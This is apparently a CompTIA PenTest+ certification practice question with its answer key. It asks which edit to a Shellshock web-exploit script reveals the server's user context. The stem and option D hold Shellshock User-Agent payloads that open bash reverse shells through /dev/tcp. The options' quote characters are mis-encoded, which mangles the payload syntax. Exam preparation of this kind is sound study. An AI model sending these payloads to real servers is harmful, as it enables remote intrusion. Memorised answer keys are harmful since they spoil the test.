CompTIA PenTest+ (PT1-002) — Question 43

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {`User-Agent`: `() { ignored;};/bin/bash `"i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/ html,application/xhtml+xml,application/xml`}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

Answer options

• A. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
• B. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
• C. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/sh ג€"i ps ג€"efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
• D. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€, ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}

Correct answer: A

Explanation

The correct answer is A because it executes commands that directly identify the user context using 'id;whoami'. The other options either do not provide user context information or execute irrelevant commands that do not help in identifying the user context.